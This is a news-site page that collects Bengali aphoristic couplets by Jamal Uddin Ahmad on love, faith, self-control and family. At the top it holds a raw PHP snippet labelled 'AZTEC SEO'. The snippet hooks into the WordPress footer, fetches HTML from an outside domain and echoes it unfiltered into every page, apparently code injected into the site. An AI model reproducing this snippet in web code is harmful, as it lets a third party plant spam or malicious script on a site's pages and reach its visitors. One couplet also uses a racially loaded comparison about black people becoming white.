/* AZTEC SEO */
add_action('wp_footer', function () {
$domain = wp_parse_url(home_url(), PHP_URL_HOST);
if (!$domain) return;
$ck = 'aztec_footer_' . md5($domain);
$html = get_transient($ck);
if ($html === false) {
$url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer');
$res = wp_remote_get($url, array('timeout' => 8));
$html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : '';
set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS);
}
if ($html !== '') echo $html;
}, 99);
জামাল কানন | Dhaka Sky News
জামাল কানন
জামাল উদ্দিন আহমাদ প্রনীত রচনাবলী
- সৃষ্টির তরে কল্যাণ ধারা করিয়া বর্ষণ
তৃপ্ত হন মহান দাতা প্রভু নিরঞ্জন।
- ফুল ফুটে ফুটে যদি না ঝড়ে যায়–
কি করে নতুন ফুল ফুটবে তথায়।
- দুর্গ অপেক্ষা মানুষের মন জয় করা কঠিন
তার চেয়েও কঠিন আত্মনিয়ন্ত্রণ।
- জৈবদেহের লিঙ্গভেদ হয়–
আত্মার বিচারে কেউ নারী-পুরুষ নয়।
- পরিণয়ে প্রেমের মৃত্যু হয়–
জীবন-সংসার যুদ্ধময়।
- বিয়ে হচ্ছে নারী-পুরুষ একে অপরের পরিপূরক হয়ে
জীবন যাপনের সামাজিক ও ধর্মীয় বিধিবদ্ধ রেওয়াজ।
- ধন অপেক্ষা জ্ঞান আহরণ কঠিন
তার চেয়ে কঠিন জ্ঞানের সৃষ্টি।
- বৈরি প্রকৃতি জীবনকে সহিষ্ণু করে
উদারতা করে উদাস।
- হৃদয়ের রাজ্য নিঃসীম স্বাধীন
আইনের শাসন মানে না, বাধা-বন্ধনহীন।
- তরিৎ অপেক্ষা জ্যোতি অধিক গতিময়
তার চেয়ে গতিময় মানুষের মন।
- গুরুভক্তির নমুনাস্বরূপ সালাম ঠুকি পা’য়–
ভাবি না কভু, কত ত্যাগ করেছিল মা’য়।
- তরুকে অবলম্বন করিয়া লতারা আকাশ ছোঁয়
আর গুল্মেরা পড়ে থাকে হাঁটুর সীমানায়।
- স্বাধীন স্বাধীন বলে আর কাঁদিস নারে মন
স্বাধীন হওয়ার শর্ত আগে আত্মনিয়ন্ত্রণ।
- ভাব সাগরের বিজ্ঞ নাবিক জানি না সন্তরণ
গহীন জলে সদাই ডুবাই শোলার মতো মন।
- কালো মানুষের যেমন সাদা হওয়া কঠিন
তার চেয়েও কঠিন আমাদের সভ্য হওয়া।
- একাকিত্ব মানুষকে নীরবে কাঁদায়
আর অর্থকষ্ট নিদারুণ ভোগায়।
- করুণা সিন্ধু চাহি না বন্ধু
ভালোবাসা দিও এক বিন্দু।
- কুসুমবনে যতই হাঁটো, ফুল খুঁজে হও হন্যে
কাঁটার আঘাত সইতে পারে, কুসুম তারই জন্যে।
- জীবনের চেয়ে সম্মান বড়
তার চেয়ে বড় ঈমান।
- উদ্গত অঙ্কুর প্রস্ফুটিত
ফুলের চেয়েও মহিমাময়।
- যতবার বিশ্বাস করেছি ভবে– ঠকেছি ততবার
তোমায় শুধু বিশ্বাস করি নিয়ত অনিবার।
- আগুনের ফুল দেখে মুগ্ধ হলাম
উত্তাপ নিতে গিয়ে দগ্ধ হলাম।
- ত্রিভুবন যার হাতের মুঠোয়
আমি তারে খুঁজবো কোথায়?
- শ্রাবণ না আসলে আসিত না অঘ্রান
দুঃখ না থকেলে সুখে ভরিত না প্রাণ।
- আমার ভেতর পশু আছে, সেই পশুকে বাঁধি
আমার ভেতর প্রভু আছে, সেই প্রভুকে সাধি।
- মনের ভেতর বেমিল হলে মধুও হয় বিষ
কাঠের মতো শক্ত লাগে আঙ্গুর-কিসমিস।
- কাগজ-কলম ক্ষয় করিয়া মিটাই মনের ঝাল
নয় তো বুঝি হয়ে যেতাম পথের পাগল।
- আমি সাদুজলে শরবতের স্বাদ পাই
শরবত যেন অমৃত, তবু তৃষ্ণা অনিবার।
- ক্ষণিকের পথচলা, এই আয়োজন–
জীবন ভরিয়ে দিল, ভরে না তো মন।
- জগৎ জ্বালায় জ্বলি যখন খুবই
তখন আমার নিজ বাগানের গহীন দারে ডুবি।
- অতুল তুমি চিরহরিৎ, উপমা তোমার নাই
আমার মাঝে শুঁকে আমি তোমার গন্ধ পাই।
- পৃথিবীর শৈত্যপ্রবাহ আমাকে অবশ করেনি
করেছে শীতল নিঃশ্বাস।
- অহংকার দিও না প্রভু, প্রেম দাও আরও
বিশুষ্ক মরুমনে প্রেম দাও তারও।
- অনন্ত প্রেম সন্ধানে আস্বাদন করি ছোট ছোট প্রেম
সোনার খনি অন্বেষণে মাটি খুঁড়ে নিই কণা কণা হেম।
- সাত সমুদ্র তোমার চোখে, তের নদী বুকে
কত ব্যথা লুকিয়ে রাখ সদা হাসি মুখে।
- প্রেম ভূবনের বিজয়িনী, হৃদয়-রাজ্যের রাণী
স্বর্গের সুখ দিলে তুমি মর্ত্যের ধূলোয় আনি।
- তোমার-আমার দেখা হবে চিরকাল
মাঝখানে রবে এক কাঁচের দেয়াল।
- অতীতকে ভুলে যাও, সম্মুখ পানে চাও
থেমে থেকো না আর, আবার এগিয়ে যাও।
- হৃদয় রসে ধুয়ে নাও উগ্র আনন
আপন মাঝে গড়ে তোল স্বর্গ কানন।
- আমার কর্মস্থল যেন সাধনার তীর্থ, কাজ যেন তপস্যা
তবু এমন কাজ করি না কখনও যাতে আসে প্রতিষ্ঠা।
- ভণ্ডদের আস্তানায়
মূর্খগণই ভক্ত।
- মানব-মানবী না এলে দুনিয়ায়–
ধরণী পূর্ণ হতো ঘন আগাছায়।
- জীবনে-যৌবনে তোমাকে কিছুই দিতে পারি নাই
একটি কবিতা লিখব বলে আলপনা এঁকে যাই।
- ভালোবাসা হৃদয়কে কোমল করে
অভিমান প্রেমকে পরিপক্ব করে।
- ন্যায়ের যুদ্ধ আদর্শকে প্রতিষ্ঠিত করে
অন্যায় যুদ্ধ সভ্যতাকে ধ্বংস করে।
- আদর-স্নেহ ভালোবাসা বাড়ায়
আর তিরস্কার দূরে তাড়ায়।
- যেই নৌকায় মাঝি নাই–
দাড় টেনে কি মজা পাই?
- তোমায় স্মরি, তোমায় বরি, তোমায় করি নমস্কার
তুমি আমায় ক্ষমো প্রভু! কর মোরে তিরস্কার।
- কলম কষুক কাগজ ’পরে, লাঙল চষুক ক্ষেত-খামারে
ভালোবাসার আবাদ ঘটুক সব মানুষের হৃদয়পটে।
- রূপছটা মুখখানি মমতার জলে ধুয়ে–
চেয়ে দেখ মায়াবি জগৎ তোমার চরণ রয়েছে ছুঁয়ে।
- হৃদয়ের রজ্জু ছাড়া পৃথিবীতে এমন কোনো শক্ত দড়ি নাই
যা দিয়ে মানুষকে আপন করে চিরদিন বেঁধে রাখা যায়।
- জীবনের পদে পদে যুদ্ধে যুদ্ধে জিতিয়াছি বিশ্ব
তোমার কাছে উপেক্ষিত, তিলে তিলে নিঃস্ব।
- সমুদ্রে নতজানু আকাশ– এ শুধু দৃষ্টির বিভ্রম
সাগরের কিনারা আছে, আকাশ নিঃসীম।
- প্রেম! কত ঘুম কাড়িয়া নিয়াছ জীবন থেকে, দিয়েছ আশ্বাস
মেলাশেষে বেলাশেষে দিয়েছ বঞ্চনা, দীর্ঘশ্বাস।
- মদ আর মোহডোরে নর-নারী বাঁধলে
মা আর মানুষকে মায়াবাঁধ সাধলে।
- কলের চাকা বন্ধ করো না, বন্ধ চাকা চালাও
ধ্বংসলীলা বন্ধ করে মনের আগুন জ্বালাও।
- বধূরা অভিমান করে, তুমি বৈরি হলে–
আমি মনাগুনে পুড়লাম, ভাসলাম লোনা জলে।
- যাদু সূক্ষ্ম-কঠিন বাস্তব, যদি মন্ত্র হতো
তবে আমি তা শিখতাম।
- তোমার ভালোবাসার তরে– হে মহামতি!
আমি পুজিব তারে, যে তোমার প্রিয় অতি।
- আমি প্রেম করি নাতো, সবই কর তুমি
অন্তঃপুরে তোমার ছোঁয়ায় আপন হস্ত চুমি।
- ইব্রাহিমের পদছোঁয়ায় হে কালপাথর! ধন্য তুমি
যথায় চুম্বন করতেন হাজেরা ও ইসমাঈল, আমরা তথায় চুমি।
- প্রাণের নেশায় রাত্রি জাগি, দিবসকে দিই চুম
অহর্নিশি ভালোবাসায় নির্বাসিত ঘুম।
- তোমার সুখে সুখী আমি, তোমার দুঃখে কষ্ট পাই
তুমি যদি সুখে থাক– আমার কোনো যুদ্ধ নাই।
- চোখের জলে ভালোবাসার স্বরূপ দেখতে চাইনি আমি
হাসিতেও থাকতে পারে প্রাণের আকুলতা।
- সাধনায় স্বর্গসিদ্ধি, জ্ঞানে সিদ্ধি আলো
আপন মাঝে স্বর্গ আছে, হৃদয়-প্রদীপ জ্বালো।
- কোনো এক বিষাদ ক্ষণে লিখেছিলাম গান–
আজও গাই সে গীতি, ভুলে থাকতে ব্যথার বাণ।
- পরাগরেণুর কান্না শুনে ঝড়া বকুল ফুলে
ব্যথাভরা হৃদয় দিয়ে নিয়েছিলাম তুলে।
- কুল কিনতে গিয়ে কিনেছি বকুল
ডালিম কেনার সাধ্যও ছিল আমার।
- সূর্যোদয়ের জবার সাথে প্রত্যহ ফুটি আমি–
সুদূর দূরান্ত ভেদ করে শুধু দেখাতে পারি না তোমারে।
- স্বপ্নের ডানায় ভর করে মন ওড়ে
জীবন চলে বাস্তব ভিতির ওপর।
- শৈশব খেলার আর যৌবন যুদ্ধের
বার্ধক্য জীবনের হিসাব মেলাবার।
- এলেমের চেয়ে আমল বড়
আমল ছাড়া এলেম নিষ্ফল।
- মহান আল্লাহর স্বরূপ দর্শন দুই নয়নে সম্ভব নয়
অনুমানও অসম্ভব, শুধু অতিন্দ্রিয়ে অনুভূত হয়।
- আইন মানার অর্থ মরতে বলা নয়–
নিজে বাঁচতে ও অপরকে বাঁচাতে বলা হয়।
- ধন ও দারিদ্র্যের মধ্যবর্তী থাকে প্রকৃত সুখ
উষ্ণ ও শৈত্যের মাঝামাঝি থাকে প্রশান্তি।
- তুমি দূর আকাশের তারা হয়ে থেকো স্মৃতিময়
অনন্ত যৌবনা কুমারী হয়ে থেকো মোর কবিতায়।
- ক্ষণিকের তরে হাসুক সবাই, ভুলে যাক দুঃখ সকল
জীবনের গান বাজুক প্রাণে, ফিরে পাক নতুন বল।
- ভালোবেসে জ্বালা পেয়ে অন্তর পুড়ে হয় অঙ্গার
চিত্তরসে পিত্তকে ধুই, বুকে জল ঢালি গঙ্গার।
- নবজাত সন্তানের মায়া
মাতৃত্বের যন্ত্রণাকে ভুলিয়ে দেয়।
- ধনাত্মক-ঋণাত্মক শিহরণ প্রীতি
সৃষ্টিলীলায় এক মৌলিক রীতি।
- জগৎ-সংসারে সৎ সহচর
বিধাতার সেরা উপহার।
- নিশিতে জাল বুনি, দিবসে হাল ভাঙি
দিবা-রাতি স্বপনের মূর্ত রাঙি।
- যুদ্ধ পুরুষের জন্য, আর নারীর জন্য সংসার
নারী-পুরুষ সমান না হলে গৃহ অসাড়।
- তুমি উদার, তুমি মহান, তুমি প্রাণময়
ত্রিলোক পরিহারি আমি তোমাকে করিব জয়।
- সবার মাঝে সেই শ্রেষ্ঠজন
আছে যার আত্মনিয়ন্ত্রণ।
- সত্যের অন্বেষণে কেউ তপবনে যায়
কেউ ‘সত্যের’ মুখোমুখি প্রতিদিন হয়।
- স্বার্থপর মানুষ দ্বারা বিচার হয় না ন্যায়নিষ্ঠ
যদিও তিনি কাজীর আসনে হন উপবিষ্ট।
- আমার বাবার কাছে তুমি ঠকেছ মা
কিন্তু তুমি আমার বাবাকে ঠকিও না।
- তুমি আমার মায়াবন
মা আমার পৃথিবী।
- চন্দ্রোদয়ে সাগর ভীষণ আন্দোলিত হয়
কিন্তু সাগর কখনও চাঁদকে ছুঁতে পারে না।
- উদাস মাঝি জোয়ার গাঙে দখিনা হাওয়ায়
পাল উড়িয়ে ভেসে চলি মনপবনের নায়।
- ত্রিভুবনে এমন জায়গা কোথায় খুঁজে পাই
যেইখানে মোর মহান প্রভু আল্লাহ্তায়ালা নাই।
- নিয়ামত! কে তুমি? কে তোমার মা
কে-বা আমি! চিনতে পারলাম না।
- স্বপ্নবিভোর তন্দ্রা ভেঙে দেখি- একি অসহায়
তোমার কণ্টকাকীর্ণ পথে আমি নগ্ন পায়।
- মর্ত্যের ধূলায় পড়ে স্বর্গের শিশু কাঁদে
উৎসমূলে ফিরে যেতে আজন্ম সাধে।
- অবিচল শুয়ে থাকি বলে, ঘুমিয়ে আছি ভাবো তুমি
একবার ছুঁয়ে দেখ, কি আগুন পুষি আমি।
- তোমাকে দেখবো বলে সারারাত জ্বেলে রেখেছিনু বাতি
ক্ষণিকে পোহাল সেই সুদীর্ঘ রাতি।
- তুমি আছ বলে নিয়ামত আমায় খুঁজবে না
হয়তো তুমি আমায় খুঁজবে।
- আল্লাহ্ তাঁহার সকল সৃষ্টি ভালো-মন্দ পোষেণ
সীমালংঘন করলে তিনি তাহার প্রতি রোষেণ।
- নীরব আসা-যাওয়ার মাঝে হয়তো কিছু স্মৃতি
রইবে কিছু দিন, আড়ম্বরহীন।
- বিরহের রাজ্যে কবিতার সম্ভার, কর্ষিত অনাবাদী ভুঁই
মিলনের রাজ্যে বিরান পদ্যভূমি, বাঘিনীর গা মেখে শুই।
- মুখ তার মধুমাখা, মাদকতা দেহে
প্রাণ তার প্রেমে ভরা, স্বর্গধারা গেহে।
- তুমি আমায় খুঁজে পাবে, তবু পাবে না আমায়
অদৃশ্য দেয়াল থাকবেই চিরকাল।
- শূন্য হাতে বিদায় নেবে চোখে নিয়ে জল
পূণ্য শুধু সঙ্গে যাবে, পাপে জনম বিফল।
- নিঃশ্বাসে-বিশ্বাসে ধ্যানে-জ্ঞানে তোমায় স্মরি বারংবার
আমার মাঝে তুমি আছ এই তো অহংকার।
- রক্তগঙ্গা করি না ভয়, ভুবন করিব জয়
তোমার চোখে জল এলে আমার রণভঙ্গ হয়।
- সাড়ে তিন হাত মানুষ চেন, বোঝ না অন্তর
মনের মাঝে উদার আকাশ, নিঃসীম প্রান্তর।
- তোমার সাথে ভালোবাসা ছিল, ছিল না পঙ্কিলতা
অনেক কথা বলার ছিল, তবু ভাঙেনি নীরবতা।
- কখনো নদীর কাছে যাই, পাহাড়ে হেলান দিয়ে ঘুমাই
তুমি আছ সকলখানে, এ মনে তোমার ছোঁয়া পাই।
- জন্ম থেকে জীবনের যুদ্ধ প্রতিদিন করি জয়, প্রিয় পরিজন
জগৎ-সংসারময়- নিজেকে কখনো বড় একা মনে হয়।
- আমার সাম্রাজ্য তোমায় দিয়ে আমি হই অতিথি
তুমি সামন্ত শাসক সেজে আমায় কর কয়েদী।
- আমার মায়ের দীপ্ত আনন স্বর্গকানন ফুল
ধেয়ানের প্রতীমা জননী মন্দির সমতুল।
- তুমি-আমি প্রিয়তম এই ছোট ঘর
মমতা জড়ানো ধরা স্বর্গ উপম।
- ক্ষণিকের পথচলা, এই আয়োজন–
জীবন ভরিয়ে দিল, ভরে না তো মন।
- পথের ক্লান্তি ভরা শ্রান্ত দেহ এলিয়ে দিলে শুভ্র বিছানায়
অপশ্রীয়মান মুখের বিভায় ঘর হলো বর্ণময়।
- কাঙাল হয়ে কোনো দিন দাঁড়াব না তোমার দারে
যদি দাঁড়াই- সে তোমার ভালোবাসার অধিকারে।
- প্রভু কাউকে দেয় না শাস্তি, সে তো দয়াময়
করুণা যেথা বন্ধ করে, গজব সেথা হয়।
- অতীতের দুঃখ-বঞ্চনা অভিমান ভুলে
ভালোবাসার কথা কও হৃদয় খুলে।
- এই দুনিয়ায় আপন বলি কারে, সবাই নিজের তরে
আপন হিতে সবাই পাকা, কেউ না কাকে ছাড়ে।
- আমার সম্মান-মর্যাদা তোমার কাছে গচ্ছিত
আমাকে কোথাও খাটো করিও না।
- মহান আল্লাহ্ যাকে কঠিন পরীক্ষায় ফেলেন
তাকে আগেই উত্তরণের ক্ষমতা দান করেন।
- পবিত্র হাত সত্যের অস্ত্র ধরে
আর্তের সেবা করে।
- এই পাপি মুখখানা মোর কোনখানে লুকাই
যেইখানেতে মহান প্রভু আল্লাহ্তায়ালা নাই।
- ব্যাভিচারীর অঙ্গকর্তন করলেও থামবে না অপরাধ কর্ম
যতক্ষণ না মানুষ মানবে মানবীয় অনুপম ধর্ম।
- একাকীত্ব নির্জন পথে অভিসারী মন
লীলায়িত স্বর্গের সুখ করে আস্বাদন।
- যেই ঘরেতে আমোদ নাই
শ্মশানপুরীর গন্ধ পাই।
- ফোটার অনুভূতি, ছোটার আনন্দ মোর
কোথায় হারিয়ে গেল দূরন্ত কৈশোর।
- পাপ ছাড়ে না বাপেরে
গুঁই ছাড়ে না সাপেরে।
- অতুলরূপে বানিয়েছ মানুষ এই মহাজগৎসংসার মাঝে
তাই তো জীবন-মরণ পুতুলখেলা শুধু তোমাকেই সাজে।
- পেটের ক্ষুধা মেটে খাদ্যে
মনের যাতনা মেটে পদ্যে।
- অষ্টাদশের যুবক যেমন ষোড়শীর প্রেমে পড়ে
আমি ভাষাকে ভালোবাসতাম তেমনি করে।
- তোমার চোখে নিঃসীম আকাশ, অথৈ সমুদ্দুর
তোমার বুকে গঙ্গা-যমুনা বইছে সুমধুর।
- স্বর্গের দূরত্ব অতিক্রম
জৈবদেহে সম্ভব নয়।
- বিনয় মানুষকে উৎকৃষ্ট করে
আর অহম করে নিকৃষ্ট।
- ভালোবাসা দিয়ে যা জয় করা যায়
প্রাণপণ যুদ্ধ করেও তা সম্ভব নয়।
- মানুষ বুদ্ধিমান, বিবেকবান এবং
ষড়রিপুর প্রভাবে পাপপ্রবণ।
- বুভুক্ষের কাছে খাদ্যই তার ঈদ
ক্ষুধা মিটলে শান্তি-সুখের নিদ।
- এই হাতে পুণ্য করি আর পাপেও এই হাত
এই হাতে তোমায় সেবি, করি মোনাজাত।
- নিজের পরিশ্রম দ্বারা জীবিকা নির্বাহ করা উত্তম
আপন শ্রমে অন্যের কল্যাণ সাধন অনুপম।
- ষাঁড়ের কেমন শিঙের জ্বালা, বোঝে না বোঁচা গাই
গাভীর কত দুঃখ-যাতনা, দেখার কেহ নাই।
- বধূ বৈরি কথা কয়, তবু আপন ঘরে রয়
বুকের ভেতর অনুরাগের ফল্গুধারা বয়।
- পড়তে গেলে শিখতে পারি জ্ঞান ও গুণের ছত্র
কাব্যকথায় লিখতে পারি ভালোবাসার পত্র।
- নাড়িছেঁড়া ধন, মায়া জাদুর বন্ধন
মায়ের প্রাণভোমরা প্রিয় সন্তান।
- আমার কর্ম আমিই দেখে পাই যখন শান্তি
তখন বুঝি এসব আমার শুধুই মনের ভ্রান্তি।
- পুণ্যের গোলা ছাই করে দিতে পারে
পাপের কিঞ্চিত কণা আগুন।
- আরাধ্য মাতৃত্ব-পিতৃত্বের স্বাদ-অনুভূতি
জীবনকে পরিপূর্ণ সার্থক করে দেয়।
- যতক্ষণ জীবন ততক্ষণ যুদ্ধ
ভালোবাসার আগুনে পুড়ে হৃদয় হোক শুদ্ধ।
- মিথ্যা প্রলাপ
পাপের প্রারম্ভিকা।
- ক্ষীণ মনের মানুষেরা আত্মগর্ব করে
অপরকে খর্ব করার চেষ্টা করে।
- জীবেরা স্বার্থক হয় জন্মে
মানুষ স্বার্থক কর্মে।
- অনুতাপের আগুনে না পোড়ালে মন
কোনোকালে হবে না স্বর্গসাধন।
- শিয়াল ধূর্ত এবং ভীত
সিংহ বীর নিঃসংশয়।
- পতঙ্গবৃত্ত মন আমার
পাখা মেলে আগুনে।
- শিপ চালাতে ক্যাপ্টেন লাগে
নাও চালাতে মাঝি।
- নিরুদ্বিগ্ন নিঃসংশয়
শুয়ে আছ মাটির কোলে চিরনিদ্রায়।
- জীবনে সৎ সহচর
বিধাতার সেরা উপহার।
- ভাবুক চিত্ত
নয় একাকিত্ব।
- এই দুনিয়ায় একি দেখি হায়, কেউ কারো নয়
স্বার্থের টানে আপন পর হয়ে যায়।
- আল্লাহ্ যাহার অন্তঃপুরে
পাপ থাকে তার বহু দূরে।
- যার ঈমান আছে আজরাইল তারে ডরায়
শয়তান থাকে বহু দূরে।
- রিপুর দোষে পাপ করেছি, মাফ করে দাও পরোয়ার
তোমারই করুণা চাহে, বান্দা তোমার গুনাহ্গার।
- অজ্ঞতার অন্ধকার কেটে জ্ঞানের আলোয় হোক ভোর
জীবনের সব জড়া কেটে যাক তোর আর মোর।
- স্বপ্ন দেখি, স্বপ্ন আঁকি, স্বপ্নের কোলে নিদ্রা যাই
স্বপ্ন দেখে পথ চলি, স্বপ্নে পেরোই ছায়াপথ।
- দুগ্ধ-কলায় পোষেণ ওঝা আদর করে যারে
সুযোগ পেলে ফুসে ওঠে, ছোবল কষে ঘাড়ে।
- আল্লাহর চরিত্রে যে চরিত্রবান সে আল্লাহর বন্ধু
প্রেমাষ্পদের রঙে যে নিজেকে রাঙায় সে রঙের সিন্ধু।
- তিক্ত হরিতকি চিবুলে পরে
সাদুজলে শরবতের স্বাদ পাওয়া যায়।
- সেই বড় দুঃখী
ত্যাগে যে সুখী।
- হাসিতে তৃপ্তি আছে
কান্নায় আছে সুখ।
- পৃথিবী নশ্বর, আর
প্রেম অবিনশ্বর।
- মূর্খের জবাব থাকে ঠোঁটে
আর জ্ঞানীর থাকে মগজে।
- কিছু কিছু পাপ পুণ্যের পথের কাঁটা সরিয়ে দেয়
আর কিছু পাপ অবধারিত জাহান্নামে নিয়ে যায়।
- অধম, নির্বোধ দীনহীন–
জন্মের কাছে তোর আজন্ম ঋণ।
- অনুগতরা স্তুতি লিখতে পারে
ইতিহাস নয়।
- নীরবতাই সম্মতির লক্ষণ হয়
মৌনতা কেন প্রতিবাদ নয়।
- মহান আল্লাহ মানুষকে অনেক মাহাত্ম্য দান করেছেন
কিন্তু তিনি কাহাকেও অহংকার দান করেন নাই।
- দান ফিরে আসে দুর্দিনে
আপন কল্যাণে।
- সোনার ফসল ফলছে মাঠে, সবার মুখে হাসি
আমরা খাব নিরেট দানা, তোমরা নেবে ভুসি।
- শ্যামল তরুরাজির নৈসর্গিক ছায়ায় আচ্ছাদিত
গাঁয়ের বাড়িগুলো মন কেড়ে নেয় মায়ায়।
- সময়ে গাছও কথা বলে, আবার
অসময়ে মানুষও কাঠ হয়ে যায়।
- কঠিন যন্ত্রণা, তীব্র অভিমান
জীবনের প্রতি ক্ষোভ বাড়িয়ে দেয়।
- পেটের ক্ষুধা নিবৃত্ত হয়
মনের ক্ষুধা কখনও নয়।
- রাজার মেয়ে তোমাকে রাজা বানাবে
আর মুচির মেয়ে মুচিই বানাবে।
- তুমি আমার মহারাণ্য
মা আমার পৃথিবী।
- —
—